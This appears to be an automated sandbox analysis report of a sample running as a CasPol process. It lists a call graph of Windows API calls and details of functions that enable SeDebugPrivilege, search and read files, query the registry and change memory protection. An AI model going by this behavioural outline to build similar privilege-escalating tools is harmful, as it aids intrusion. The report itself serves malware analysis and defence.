API calls 7872->7874 7879 4069d3 GetFileAttributesA 7873->7879 7874->7873 7876 40e52c 7877 40e540 7876->7877 7880 40e293 7876->7880 7877->6841 7877->6843 7879->7876 7895 4067ba CreateFileA 7880->7895 7882 40e2a7 7883 40e2b4 GetFileSize 7882->7883 7884 40e4ac 7882->7884 7885 40e4a3 CloseHandle 7883->7885 7886 40e2cc ??2@YAPAXI memset ReadFile 7883->7886 7884->7877 7885->7884 7893 40e314 7886->7893 7887 407193 memcpy 7887->7893 7888 40e49c ??3@YAXPAX 7888->7885 7889 407139 strlen strlen _memicmp 7889->7893 7890 40e39b memcpy memcpy 7891 407139 3 API calls 7890->7891 7891->7893 7892 406958 2 API calls 7892->7893 7893->7887 7893->7888 7893->7889 7893->7890 7893->7892 7894 4029d9 strlen 7893->7894 7894->7893 7895->7882 7897 414060 7896->7897 7898 40dd72 memset strlen strlen 7897->7898 7899 40ddbe 7898->7899 7900 40ddad 7898->7900 7910 4069d3 GetFileAttributesA 7899->7910 7901 406b4b 4 API calls 7900->7901 7901->7899 7903 40ddd4 7904 40dddd 7 API calls 7903->7904 7905 40dfcf 7903->7905 7904->7905 7908 40dea4 7904->7908 7905->6851 7907 406958 strlen memcpy 7907->7908 7908->7905 7908->7907 7909 40df4c sprintf GetPrivateProfileStringA GetPrivateProfileStringA 7908->7909 7911 40dcf2 7908->7911 7909->7905 7909->7908 7910->7903 7912 40dd0d 7911->7912 7913 40dd54 7912->7913 7914 40dd1f strtoul 7912->7914 7913->7908 7914->7912 7914->7913 7915->6882 7975 406d91 memset 7916->7975 7918 412d78 ??2@YAPAXI 7919 412d87 7918->7919 7920 412d90 ??2@YAPAXI 7919->7920 7921 412da2 7920->7921 7922 412dab ??2@YAPAXI 7921->7922 7923 412dc2 ??2@YAPAXI 7922->7923 7925 412de6 ??2@YAPAXI 7923->7925 7927 40ebd8 7925->7927 7928 412f02 7927->7928 7976 4067ba CreateFileA 7928->7976 7930 412f0f 7931 412f44 7930->7931 7932 412f17 GetFileSize 7930->7932 7931->6886 7977 412ed6 7932->7977 7934 412f28 7935 406ed6 ReadFile 7934->7935 7936 412f34 CloseHandle 7935->7936 7936->7931 7980 4075ad MultiByteToWideChar 7937->7980 7940 412fa1 7942 407491 free 7940->7942 7941 412ed6 2 API calls 7943 412f85 memcpy 7941->7943 7944 40ec08 7942->7944 7943->7940 7946 40d1a5 7944->7946 7947 413095 7946->7947 7995 40733e free free 7947->7995 7949 4130c7 7996 40733e free free 7949->7996 7951 4133aa 7951->6887 7952 40746b 4 API calls 7954 4130d2 7952->7954 7953 412fb0 19 API calls 7953->7954 7954->7951 7954->7952 7954->7953 7955 41322b memcpy 7954->7955 7997 412768 7954->7997 7955->7954 7958 412e65 7957->7958 7959 412e5a ??3@YAXPAX 7957->7959 7960 412e7c 7958->7960 7961 407491 free 7958->7961 7959->7958 7962 407491 free 7960->7962 7964 412e92 7960->7964 7965 412e75 ??3@YAXPAX 7961->7965 7966 412e8b ??3@YAXPAX 7962->7966 7963 412ea8 7968 412ebe 7963->7968 8006 40733e free free 7963->8006 7964->7963 7967 407491 free 7964->7967 7965->7960 7966->7964 7969 412ea1 ??3@YAXPAX 7967->7969 7971 412ed4 7968->7971 8007 40733e free free 7968->8007 7969->7963 7971->6876 7972 412eb7 ??3@YAXPAX 7972->7968 7974 412ecd ??3@YAXPAX 7974->7971 7975->7918 7976->7930 7978 412ee0 ??3@YAXPAX 7977->7978 7979 412eeb ??2@YAPAXI 7977->7979 7978->7979 7979->7934 7981 407634 7980->7981 7982 4075d7 7980->7982 7981->7940 7981->7941 7983 40746b 4 API calls 7982->7983 7984 4075f5 MultiByteToWideChar 7983->7984 7986 407614 7984->7986 7987 40762a 7984->7987 7990 407564 WideCharToMultiByte 7986->7990 7988 407491 free 7987->7988 7988->7981 7991 4075a4 7990->7991 7992 407586 7990->7992 7991->7987 7993 40746b 4 API calls 7992->7993 7994 407590 WideCharToMultiByte 7993->7994 7994->7991 7995->7949 7996->7954 7998 412d44 7997->7998 8001 412b5d 7997->8001 7998->7954 7999 412b83 strlen strncmp 7999->8001 8000 412cc0 strlen strncmp 8000->8001 8001->7998 8001->7999 8001->8000 8002 412c93 memcpy 8001->8002 8003 412c0b memcpy atoi WideCharToMultiByte 8001->8003 8005 406d5a strtoul 8002->8005 8003->8001 8005->8001 8006->7972 8007->7974 8008->6899 8009->6919 8020 40f94e 8010->8020 8013 40f946 8013->6919 8014 40f8c8 memcmp 8014->8013 8015 40f8df 8014->8015 8015->8013 8016 40f94e 3 API calls 8015->8016 8019 40f8f5 8016->8019 8017 40f94e 3 API calls 8017->8019 8019->8013 8019->8017 8025 40f689 8019->8025 8021 40f960 SetFilePointer 8020->8021 8022 40f96e memset 8020->8022 8021->8022 8023 406ed6 ReadFile 8022->8023 8024 40f8c4 8023->8024 8024->8013 8024->8014 8026 40f696 8025->8026 8027 40f806 8026->8027 8028 40f94e 3 API calls 8026->8028 8027->8019 8029 40f6ca 8028->8029 8029->8027 8030 40f94e 3 API calls 8029->8030 8031 40f6e7 8030->8031 8032 40f94e 3 API calls 8031->8032 8035 40f779 8031->8035 8034 40f710 _strcmpi 8032->8034 8034->8035 8036 40f734 _strcmpi 8034->8036 8035->8027 8037 40f789 _strcmpi 8035->8037 8055 40f5c1 8035->8055 8036->8035 8038 40f74b _strcmpi 8036->8038 8040 40f80b 8037->8040 8041 40f79d _strcmpi 8037->8041 8038->8035 8039 40f762 _strcmpi 8038->8039 8039->8035 8042 40f5c1 2 API calls 8040->8042 8041->8040 8043 40f7b1 _strcmpi 8041->8043 8045 40f822 8042->8045 8043->8040 8044 40f7c5 _strcmpi 8043->8044 8044->8040 8046 40f7d9 _strcmpi 8044->8046 8045->8027 8047 40f826 _mbscpy 8045->8047 8046->8035 8046->8040 8048 40f84e 8047->8048 8048->8027 8049 40f5c1 2 API calls 8048->8049 8050 40f83a _strcmpi 8048->8050 8049->8048 8050->8048 8051 40f869 8050->8051 8052 40f5c1 2 API calls 8051->8052 8053 40f87f 8052->8053 8053->8027 8054 40f883 _mbscpy 8053->8054 8054->8027 8056 40f649 8055->8056 8057 40f5d8 8055->8057 8056->8035 8057->8056 8058 40f61e memcpy 8057->8058 8058->8056 8059 40f65a 8058->8059 8059->8056 8060 40f666 _ultoa 8059->8060 8060->8056 8061 41208b FindResourceA 8062 4120a4 SizeofResource 8061->8062 8065 4120ce 8061->8065 8063 4120b5 LoadResource 8062->8063 8062->8065 8064 4120c3 LockResource 8063->8064 8063->8065 8064->8065 5991 412111 EnumResourceNamesA 6020 413e10 6039 414000 6020->6039 6022 413e1c GetModuleHandleA 6023 413e2e __set_app_type __p__fmode __p__commode 6022->6023 6025 413ec0 6023->6025 6026 413ed4 6025->6026 6027 413ec8 __setusermatherr 6025->6027 6040 413fe8 _controlfp 6026->6040 6027->6026 6029 413ed9 _initterm __getmainargs _initterm 6030 413f30 GetStartupInfoA 6029->6030 6032 413f64 GetModuleHandleA 6030->6032 6041 40c66a 6032->6041 6036 413f95 _cexit 6038 413fca 6036->6038 6037 413f8e exit 6037->6036 6039->6022 6040->6029 6094 404d7a LoadLibraryA 6041->6094 6043 40c682 6044 40c686 6043->6044 6102 412192 6043->6102 6044->6036 6044->6037 6049 40c6a4 FreeLibrary 6050 40c6ad EnumResourceTypesA 6049->6050 6051 40c6d8 MessageBoxA 6050->6051 6052 40c6f0 6050->6052 6051->6044 6123 40c427 ??2@YAPAXI 6052->6123 6059 40c73a 6156 409167 memset 6059->6156 6060 40c74e 6161 40902b memset 6060->6161 6065 4077af 2 API calls 6067 40c762 6065->6067 6066 40c8b3 ??3@YAXPAX 6068 40c8d7 6066->6068 6069 40c8cb DeleteObject 6066->6069 6070 40c766 RegDeleteKeyA 6067->6070 6071 40c77b 6067->6071 6182 40733e free free 6068->6182 6069->6068 6070->6066 6071->6066 6074 40c7d5 CoInitialize 6071->6074 6166 40c5a4 6071->6166 6073 40c8e9 6183 407a7a 6073->6183 6181 40c3af RegisterClassA CreateWindowExA 6074->6181 6081 40c7e7 ShowWindow UpdateWindow LoadAcceleratorsA PostMessageA GetMessageA 6087 40c848 6081->6087 6088 40c8ad CoUninitialize 6081->6088 6082 40c7d3 6082->6074 6083 40c7a4 ??3@YAXPAX 6083->6068 6086 40c7c1 DeleteObject 6083->6086 6086->6068 6089 40c84e TranslateAccelerator 6087->6089 6091 40c871 IsDialogMessage 6087->6091 6092 40c87c IsDialogMessage 6087->6092 6088->6066 6089->6087 6090 40c8a0 GetMessageA 6089->6090 6090->6088 6090->6089 6091->6090 6091->6092 6092->6090 6093 40c88c TranslateMessage DispatchMessageA 6092->6093 6093->6090 6095 404da5 GetProcAddress 6094->6095 6096 404dcd 6094->6096 6097 404db5 6095->6097 6098 404dbe FreeLibrary 6095->6098 6100 404df4 6096->6100 6101 404ddd MessageBoxA 6096->6101 6097->6098 6098->6096 6099 404dc9 6098->6099 6099->6096 6100->6043 6101->6043 6103 40c692 6102->6103 6104 41219b LoadLibraryA 6102->6104 6106 410de1 GetCurrentProcess 6103->6106 6104->6103 6105 4121af GetProcAddress 6104->6105 6105->6103 6187 410daa 6106->6187 6109 410e02 GetLastError 6112 40c69f 6109->6112 6110 410e0a 6193 410d8a 6110->6193 6112->6049 6112->6050 6113 410e11 6114 410e36 6113->6114 6115 410e1d GetProcAddress 6113->6115 6117 410d8a LoadLibraryA 6114->6117 6115->6114 6116 410e2a LookupPrivilegeValueA 6115->6116 6116->6114 6118 410e4f 6117->6118 6119 410e53 GetProcAddress 6118->6119 6120 410e6d CloseHandle 6118->6120 6119->6120 6121 410e60 AdjustTokenPrivileges 6119->6121 6120->6112 6121->6120 6124 40c453 6123->6124 6125 40c461 ??2@YAPAXI 6124->6125 6126 40c478 6125->6126 6128 40c47d 6125->6128 6204 4092cc 6126->6204 6129 40c4b2 DeleteObject 6128->6129 6130 40c4bf 6128->6130 6129->6130 6196 406ae0 6130->6196 6132 40c4c4 6199 401000 6132->6199 6136 40c508 6137 40763d 6136->6137 6216 40733e free free 6137->6216 6141 40746b malloc memcpy free free 6144 407678 6141->6144 6142 407758 6150 407783 6142->6150 6240 40746b 6142->6240 6144->6141 6144->6142 6145 4076fc free 6144->6145 6144->6150 6217 407364 6144->6217 6232 406982 6144->6232 6145->6144 6149 407364 7 API calls 6149->6150 6229 407491 6150->6229 6151 4077af 6154 4077f5 6151->6154 6155 4077b7 6151->6155 6152 4077c7 _strcmpi 6152->6155 6153 4077de _strnicmp 6153->6155 6154->6059 6154->6060 6155->6152 6155->6153 6155->6154 6245 409141 6156->6245 6158 409196 6250 409068 6158->6250 6162 409141 3 API calls 6161->6162 6163 40905a 6162->6163 6274 408fbc 6163->6274 6280 403cb2 6166->6280 6170 40c5f1 6174 40c665 6170->6174 6283 40bbf0 memset GetModuleFileNameA strrchr 6170->6283 6171 40c5f6 6326 40c50e _strcmpi 6171->6326 6174->6082 6174->6083 6177 40c610 6305 40a8f2 6177->6305 6181->6081 6182->6073 6184 407a80 free 6183->6184 6185 407a87 6183->6185 6184->6185 6186 40733e free free 6185->6186 6186->6044 6188 410d8a LoadLibraryA 6187->6188 6189 410db5 6188->6189 6190 410db9 GetProcAddress 6189->6190 6191 410dda 6189->6191 6190->6191 6192 410dca 6190->6192 6191->6109 6191->6110 6192->6191 6194 410da6 6193->6194 6195 410d8f LoadLibraryA 6193->6195 6194->6113 6195->6113 6214 406a19 memset _mbscpy 6196->6214 6198 406af7 CreateFontIndirectA 6198->6132 6200 40102c 6199->6200 6201 401030 LoadIconA 6200->6201 6202 40100d strncat 6200->6202 6203 402c8f _mbscpy 6201->6203 6202->6200 6203->6136 6215 406d91 memset 6204->6215 6206 4092df ??2@YAPAXI 6207 4092f3 ??2@YAPAXI 6206->6207 6209 409314 ??2@YAPAXI 6207->6209 6211 409335 ??2@YAPAXI 6209->6211 6213 409356 6211->6213 6213->6128 6214->6198 6215->6206 6216->6144 6218 407372 strlen 6217->6218 6219 40737e 6217->6219 6218->6219 6220 407396 free 6219->6220 6221 40739f 6219->6221 6222 4073a9 6220->6222 6223 406982 3 API calls 6221->6223 6224 4073c2 6222->6224 6225 4073b9 free 6222->6225 6223->6222 6227 406982 3 API calls 6224->6227 6226 4073ce memcpy 6225->6226 6226->6144 6228 4073cd 6227->6228 6228->6226 6230 4074a1 6229->6230 6231 407497 free 6229->6231 6230->6151 6231->6230 6233 406989 malloc 6232->6233 6234 4069cf 6232->6234 6236 4069c5 6233->6236 6237 4069aa 6233->6237 6234->6144 6236->6144 6238 4069be free 6237->6238 6239 4069ae memcpy 6237->6239 6238->6236 6239->6238 6241 407482 6240->6241 6242 407476 free 6240->6242 6244 406982 3 API calls 6241->6244 6243 40748d 6242->6243 6243->6149 6244->6243 6263 4069e8 GetModuleFileNameA 6245->6263 6247 409147 strrchr 6248 409156 6247->6248 6249 409159 _mbscat 6247->6249 6248->6249 6249->6158 6264 414060 6250->6264 6255 408ca1 3 API calls 6256 4090b0 6255->6256 6257 408ca1 3 API calls 6256->6257 6258 4090bb EnumResourceNamesA EnumResourceNamesA _mbscpy memset 6257->6258 6259 409107 LoadStringA 6258->6259 6260 40911d 6259->6260 6260->6259 6262 409135 6260->6262 6271 408d0f _itoa 6260->6271 6262->6066 6263->6247 6265 409075 _mbscpy _mbscpy 6264->6265 6266 408ca1 6265->6266 6267 414060 6266->6267 6268 408cae memset GetPrivateProfileStringA 6267->6268 6269 408cf9 WritePrivateProfileStringA 6268->6269 6270 408d09 6268->6270 6269->6270 6270->6255 6272 408ca1 3 API calls 6271->6272 6273 408d41 6272->6273 6273->6260 6279 4069d3 GetFileAttributesA 6274->6279 6276 408fc5 6277 40902a 6276->6277 6278 408fca _mbscpy _mbscpy GetPrivateProfileIntA GetPrivateProfileStringA 6276->6278 6277->6065 6278->6277 6279->6276 6344 40955a 6280->6344 6284 40bc40 6283->6284 6285 40bc43 _mbscat _mbscpy _mbscpy 6283->6285 6284->6285 6383 4039a8 6285->6383 6287 40bcd4 6290 40bcf9 6287->6290 6398 402d81 6287->6398 6289 40bcc4 GetWindowPlacement 6289->6287 6391 40946f 6290->6391 6294 40b2f5 6295 40b370 6294->6295 6299 40b325 6294->6299 6556 40671b LoadCursorA SetCursor 6295->6556 6297 40b375 6300 4077af 2 API calls 6297->6300 6298 40b32c _mbsicmp 6298->6299 6299->6295 6299->6298 6557 40ae7d 6299->6557 6301 40b39b 6300->6301 6302 40b3e5 SetCursor 6301->6302 6304 40b3dc qsort 6301->6304 6302->6177 6304->6302 6306 40a906 6305->6306 6307 40972b 3 API calls 6305->6307 6308 40a917 GetStdHandle 6306->6308 6309 40a90e 6306->6309 6307->6306 6310 40a914 6308->6310 6574 4067d3 CreateFileA 6309->6574 6312 40aa25 6310->6312 6313 40a92d 6310->6313 6315 406830 9 API calls 6312->6315 6575 40671b LoadCursorA SetCursor 6313->6575 6316 40aa2e 6315->6316 6339 40bdcf 6316->6339 6317 40a93a 6318 40a97f 6317->6318 6324 40a999 6317->6324 6576 409f97 6317->6576 6318->6324 6582 409e6e 6318->6582 6321 40a9ce 6322 40aa17 SetCursor 6321->6322 6323 40aa0e CloseHandle 6321->6323 6322->6316 6323->6322 6324->6321 6592 406830 6324->6592 6327 40c523 _strcmpi 6326->6327 6328 40c51f 6326->6328 6329 40c534 6327->6329 6330 40c538 _strcmpi 6327->6330 6328->6170 6329->6170 6331 40c549 6330->6331 6332 40c54d _strcmpi 6330->6332 6331->6170 6333 40c562 _strcmpi 6332->6333 6334 40c55e 6332->6334 6335 40c573 6333->6335 6336 40c577 _strcmpi 6333->6336 6334->6170 6335->6170 6337 40c588 6336->6337 6338 40c58c _mbsicmp 6336->6338 6337->6170 6338->6170 6340 40bdf6 6339->6340 6341 40bdda 6339->6341 6340->6174 6608 4093d6 6341->6608 6343 40bdef ??3@YAXPAX 6343->6340 6356 409370 6344->6356 6347 4095be memcpy memcpy 6348 409618 6347->6348 6348->6347 6349 409656 ??2@YAPAXI ??2@YAPAXI 6348->6349 6351 40876f 12 API calls 6348->6351 6350 409692 ??2@YAPAXI 6349->6350 6353 4096c9 6349->6353 6350->6353 6351->6348 6353->6353 6366 4094da 6353->6366 6355 403cc1 _strcmpi 6355->6170 6355->6171 6357 409382 6356->6357 6358 40937b ??3@YAXPAX 6356->6358 6359 409390 6357->6359 6360 409389 ??3@YAXPAX 6357->6360 6358->6357 6361 4093a1 6359->6361 6362 40939a ??3@YAXPAX 6359->6362 6360->6359 6363 4093c1 ??2@YAPAXI ??2@YAPAXI 6361->6363 6364 4093b1 ??3@YAXPAX 6361->6364 6365 4093ba ??3@YAXPAX 6361->6365 6362->6361 6363->6347 6364->6365 6365->6363 6367 407491 free 6366->6367 6368 4094e3 6367->6368 6369 407491 free 6368->6369 6370 4094eb 6369->6370 6371 407491 free 6370->6371 6372 4094f3 6371->6372 6373 407491 free 6372->6373 6374 4094fb 6373->6374 6375 40746b 4 API calls 6374->6375 6376 40950e 6375->6376 6377 40746b 4 API calls 6376->6377 6378 409518 6377->6378 6379 40746b 4 API calls 6378->6379 6380 409522 6379->6380 6381 40746b 4 API calls 6380->6381 6382 40952c 6381->6382 6382->6355 6384 4039c8 6383->6384 6405 40d725 6384->6405 6386 403a14 memset sprintf 6388 403a49 6386->6388 6387 403a60 _strcmpi 6387->6388 6388->6386 6388->6387 6389 403ab1 6388->6389 6420 411ec1 6388->6420 6389->6287 6389->6289 6392 40947e 6391->6392 6394 40948c 6391->6394 6547 40923a 6392->6547 6395 4094d7 6394->6395 6396 4094c9 6394->6396 6395->6294 6552 4091aa 6396->6552 6399 402d90 6398->6399 6400 402e0a 6398->6400 6399->6400 6401 402dc4 GetSystemMetrics 6399->6401 6400->6290 6401->6400 6402 402dd8 GetSystemMetrics 6401->6402 6402->6400 6403 402de6 6402->6403 6403->6400 6404 402def SetWindowPos 6403->6404 6404->6400 6424 40d3a0 memset 6405->6424 6419 40d772 6419->6386 6421 411ee3 GetPrivateProfileStringA 6420->6421 6422 411ed4 WritePrivateProfileStringA 6420->6422 6423 411ef6 6421->6423 6422->6423 6423->6388 6425 411dae 3 API calls 6424->6425 6426 40d3e8 6425->6426 6427 40d422 6426->6427 6515 407139 strlen strlen 6426->6515 6428 40d46b memset 6427->6428 6490 41212c 6427->6490 6498 41223f 6428->6498 6437 40d4ce 6514 4069d3 GetFileAttributesA 6437->6514 6438 40d4bb 6528 406b4b _mbscpy 6438->6528 6440 40d412 6440->6427 6444 40d417 _mbscpy 6440->6444 6444->6427 6445 40d4db 6450 40d4e9 memset 6445->6450 6446 40d450 6527 4069d3 GetFileAttributesA 6446->6527 6448 40d458 6448->6428 6449 40d45e _mbscpy 6448->6449 6449->6428 6451 41223f 10 API calls 6450->6451 6452 40d529 strlen strlen 6451->6452 6453 40d55f 6452->6453 6454 40d54c 6452->6454 6542 4069d3 GetFileAttributesA 6453->6542 6455 406b4b 4 API calls 6454->6455 6455->6453 6457 40d56c 6458 40d607 memset 6457->6458 6459 41223f 10 API calls 6458->6459 6460 40d647 strlen strlen 6459->6460 6461 40d67d 6460->6461 6462 40d66a 6460->6462 6543 4069d3 GetFileAttributesA 6461->6543 6463 406b4b 4 API calls 6462->6463 6463->6461 6465 40d68a 6466 40d578 memset 6465->6466 6467 41223f 10 API calls 6466->6467 6468 40d5b8 strlen strlen 6467->6468 6469 40d5ee 6468->6469 6470 40d5db 6468->6470 6544 4069d3 GetFileAttributesA 6469->6544 6471 406b4b 4 API calls 6470->6471 6471->6469 6473 40d5fb 6474 40d696 memset 6473->6474 6475 41223f 10 API calls 6474->6475 6476 40d6d6 strlen strlen 6475->6476 6477 40d70c 6476->6477 6478 40d6f9 6476->6478 6545 4069d3 GetFileAttributesA 6477->6545 6479 406b4b 4 API calls 6478->6479 6479->6477 6481 40d719 6482 411dae 6481->6482 6546 411d68 RegOpenKeyExA 6482->6546 6484 40d76c 6489 4069d3 GetFileAttributesA 6484->6489 6485 411dc4 6485->6484 6486 411d82 RegQueryValueExA 6485->6486 6487 411dd9 RegCloseKey 6486->6487 6487->6484 6489->6419 6531 411d68 RegOpenKeyExA 6490->6531 6492 412149 6493 41216d 6492->6493 6532 411d82 RegQueryValueExA 6492->6532 6495 412172 GetWindowsDirectoryA _mbscat 6493->6495 6496 40d439 6493->6496 6495->6496 6520 40680e strlen 6496->6520 6499 412192 2 API calls 6498->6499 6500 412251 6499->6500 6501 412284 memset 6500->6501 6534 406b06 6500->6534 6502 4122a4 6501->6502 6537 411d68 RegOpenKeyExA 6502->6537 6506 412275 SHGetSpecialFolderPathA 6507 40d48f strlen strlen 6506->6507 6507->6437 6507->6438 6508 4122d1 6509 412304 _mbscpy 6508->6509 6538 4121c1 6508->6538 6509->6507 6511 4122e2 6512 411d82 RegQueryValueExA 6511->6512 6513 4122f9 RegCloseKey 6512->6513 6513->6509 6514->6445 6517 407165 6515->6517 6518 407186 6515->6518 6516 407169 _memicmp 6516->6517 6516->6518 6517->6516 6517->6518 6518->6427 6519 4069d3 GetFileAttributesA 6518->6519 6519->6440 6521 406819 6520->6521 6522 40682d 6520->6522 6521->6522 6523 406820 _mbscat 6521->6523 6524 406958 strlen 6522->6524 6523->6522 6525 406969 6524->6525 6526 40696c memcpy 6524->6526 6525->6526 6526->6446 6527->6448 6529 40680e 2 API calls 6528->6529 6530 406b5d _mbscat 6529->6530 6530->6437 6531->6492 6533 411da5 RegCloseKey 6532->6533 6533->6493 6535 406b15 GetVersionExA 6534->6535 6536 406b26 6534->6536 6535->6536 6536->6501 6536->6506 6537->6508 6541 4121c6 6538->6541 6539 412233 _mbscpy 6539->6511 6540 412216 6540->6511 6541->6539 6541->6540 6542->6457 6543->6465 6544->6473 6545->6481 6546->6485 6548 409248 memset 6547->6548 6551 4092a0 6547->6551 6549 40925f 6548->6549 6548->6551 6550 409260 SendMessageA 6549->6550 6549->6551 6550->6549 6551->6394 6553 409234 6552->6553 6554 4091b8 6552->6554 6553->6395 6554->6553 6555 4091fd SendMessageA 6554->6555 6555->6554 6556->6297 6567 40972b ??2@YAPAXI 6557->6567 6559 40ae8b 6560 40aee2 6559->6560 6561 40aea2 strlen 6559->6561 6562 40aef6 _mbsicmp _mbsicmp 6560->6562 6566 40af50 6560->6566 6561->6560 6563 40aeae atoi 6561->6563 6562->6560 6565 40aebf 6563->6565 6564 407139 strlen strlen _memicmp 6564->6566 6565->6299 6566->6564 6566->6565 6568 4097d5 ??3@YAXPAX 6567->6568 6571 409762 6567->6571 6568->6559 6571->6568 6572 40501f SendMessageA 6571->6572 6573 40504d 6572->6573 6573->6571 6574->6310 6575->6317 6577 409fe3 6576->6577 6581 409f9f 6576->6581 6597 4067ec strlen WriteFile 6577->6597 6579 409ff1 6579->6318 6580 4067ec strlen WriteFile 6580->6581 6581->6577 6581->6580 6583 409f82 6582->6583 6590 409e83 6582->6590 6598 4067ec strlen WriteFile 6583->6598 6585 409f90 6585->6324 6586 409ead strchr 6587 409ebb strchr 6586->6587 6586->6590 6587->6590 6588 4074fa 7 API calls 6588->6590 6589 4067ec strlen WriteFile 6589->6590 6590->6583 6590->6586 6590->6588 6590->6589 6591 407491 free 6590->6591 6591->6590 6593 406840 GetLastError 6592->6593 6594 406848 6592->6594 6593->6594 6599 406735 6594->6599 6597->6579 6598->6585 6600 406752 LoadLibraryExA 6599->6600 6601 406769 FormatMessageA 6599->6601 6600->6601 6602 406764 6600->6602 6603 406782 strlen 6601->6603 6604 4067a7 _mbscpy 6601->6604 6602->6601 6606 40679c LocalFree 6603->6606 6607 40678f _mbscpy 6603->6607 6605 4067b6 sprintf MessageBoxA 6604->6605 6605->6321 6606->6605 6607->6606 6609 409370 5 API calls 6608->6609 6610 4093e4 6609->6610 6611 4093f7 6610->6611 6612 407491 free 6610->6612 6613 40940a 6611->6613 6615 407491 free 6611->6615 6614 4093f0 ??3@YAXPAX 6612->6614 6616 40941d 6613->6616 6618 407491 free 6613->6618 6614->6611 6617 409403 ??3@YAXPAX 6615->6617 6619 407491 free 6616->6619 6620 409430 free 6616->6620 6617->6613 6621 409416 ??3@YAXPAX 6618->6621 6622 409429 ??3@YAXPAX 6619->6622 6620->6343 6621->6616 6622->6620 8067 411e9a 8070 411c8f 8067->8070 8071 411c9c 8070->8071 8072 411ce6 memset GetPrivateProfileStringA 8071->8072 8073 411cab memset 8071->8073 8078 406fa6 strlen 8072->8078 8083 406f2d 8073->8083 8077 411d2f 8079 406fba 8078->8079 8081 406fbc 8078->8081 8079->8077 8080 407003 8080->8077 8081->8080 8087 406d5a strtoul 8081->8087 8084 406f96 WritePrivateProfileStringA 8083->8084 8085 406f3e 8083->8085 8084->8077 8085->8084 8086 406f45 sprintf memcpy 8085->8086 8086->8084 8086->8085 8087->8081 8301 41051f _wcsnicmp 8302 41059a 8301->8302 8303 41054a 8301->8303 8306 40fd01 memset memset 8303->8306 8305 410553 WideCharToMultiByte WideCharToMultiByte 8305->8302 8306->8305 5992 414db1 5993 414dc8 5992->5993 5996 414e36 5992->5996 5993->5996 5999 414df0 5993->5999 5995 414de7 5995->5996 5997 414e17 VirtualProtect 5995->5997 5997->5996 5998 414e26 VirtualProtect 5997->5998 5998->5996 6000 414df5 5999->6000 6005 414e36 6000->6005 6006 414e0d 6000->6006 6002 414dfe 6003 414e17 VirtualProtect 6002->6003 6002->6005 6004 414e26 VirtualProtect 6003->6004 6003->6005 6004->6005 6007 414e13 6006->6007 6008 414e17 VirtualProtect 6007->6008 6010 414e36 6007->6010 6009 414e26 VirtualProtect 6008->6009 6008->6010 6009->6010 8066 4067ba CreateFileA

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 00410DE1 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00410DF0
                                                                                                                                                                                      • Part of subcall function 00410DAA: GetProcAddress.KERNEL32(00000000,OpenProcessToken,00000000,00000000,004044F8,000000FF,0000000E,?,?,0040428D), ref: 00410DC0
                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00410E02
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,LookupPrivilegeValueA,?,?,00000000), ref: 00410E24
                                                                                                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?,?,LookupPrivilegeValueA,?,?,00000000), ref: 00410E34
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,AdjustTokenPrivileges,?,?,00000000), ref: 00410E5A
                                                                                                                                                                                    • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,AdjustTokenPrivileges,?,?,00000000), ref: 00410E6B
                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 00410E78
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessTokenValue
                                                                                                                                                                                    • String ID: AdjustTokenPrivileges$LookupPrivilegeValueA$SeDebugPrivilege
                                                                                                                                                                                    • API String ID: 3328644959-164648368
                                                                                                                                                                                    • Opcode ID: bcfb295028deb42d7034a1c1e26edc5f6458782d310d68dd3fa971f052d55e9a
                                                                                                                                                                                    • Instruction ID: 180035a187f8386c87a779d0175683d60653c8262eee481a5a772ffe12dd7b09
                                                                                                                                                                                    • Opcode Fuzzy Hash: bcfb295028deb42d7034a1c1e26edc5f6458782d310d68dd3fa971f052d55e9a
                                                                                                                                                                                    • Instruction Fuzzy Hash: D2117371900205FBDB11ABE5DC85AEF7BBCEB48344F10442AF501E2151DBB99DC18BA9
                                                                                                                                                                                    Function 00407898 Relevance: 6.1, APIs: 4, Instructions: 58filestringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(00000103,00000247,?,?,004042EE,?), ref: 004078AE
                                                                                                                                                                                    • FindNextFileA.KERNELBASE(000000FF,00000247,?,?,004042EE,?), ref: 004078CC
                                                                                                                                                                                    • strlen.MSVCRT ref: 004078FC
                                                                                                                                                                                    • strlen.MSVCRT ref: 00407904
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 379999529-0
                                                                                                                                                                                    • Opcode ID: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
                                                                                                                                                                                    • Instruction ID: 3f72f9a190aab30f8f483bccc0fafde7a86c3084d5e1b238a9c8f95d2c3e0c3c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F1186B2919201AFD3149B34D884EDB77D8DF44325F20493FF19AD21D0EB38B9459755
